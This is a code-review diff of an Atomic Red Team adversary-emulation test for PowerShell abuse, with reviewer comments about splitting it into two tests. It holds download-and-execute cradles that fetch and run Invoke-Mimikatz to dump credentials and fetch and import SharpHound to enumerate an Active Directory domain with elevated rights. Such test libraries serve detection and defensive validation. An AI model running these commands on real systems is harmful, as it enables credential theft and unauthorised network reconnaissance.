atomics/T1086/T1086.yaml

```diff
@@ -19,25 +19,48 @@ atomic_tests:
     command: |
       powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
 
-- name: BloodHound
+- name: SharpHound
   description: |
-    Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run,
+    Upon execution SharpHound will downloaded and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
 
-    and then compress and store the data to the temp directory on the machine
+    Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file. 
   supported_platforms:
     - windows
   input_arguments:
-    bloodurl:
-      description: BloodHound URL
-      type: url
-      default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1
+    internal_domain:
+      description: Specify internal domain name to analyze
+      type: string
+      default: windomain.local
+    file_path:
+      description: File path for SharpHound payload
+      type: String
+      default: PathToAtomicsFolder\T1086\payloads
+    output_path:
+      description: Output path for BloodHound reports
+      type: String
+      default: PathToAtomicsFolder\T1086\payloads
+  
+  dependency_executor_name: powershell
+  dependencies:
+    - description: |
+        Validate if SharpHound.ps1 is located in #{file_path}.
+      prereq_command: |
+        if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}
+      get_prereq_command: |
+        Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1"
+
   executor:
     name: powershell
-    elevation_required: false
+    elevation_required: true
     command: |
-      IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound
+      write-host "Test 1 - Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
+      import-module #{file_path}\SharpHound.ps1; invoke-bloodhound -domain #{internal_domain} -OutputDirectory #{output_path}
+      write-host "Test 2 - Remote download of SharpHound.ps1, import and execution from $env:temp" -ForegroundColor Cyan
+      Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/SharpHound.ps1 -outfile $env:temp\SharpHound.ps1; import-module $env:temp\SharpHound.ps1; invoke-bloodhound -domain #{internal_domain} -OutputDirectory #{output_path}
```

Comment:
I would recommend breaking this out as two separate atomics. e.g. "Run Bloodhound from local disk" and "Run Bloodhound from memory using download cradle"

Reply:
Another option would be to add an input arg that lets users specify one or the other, or both, to run.

Reply:
Separated into two tests.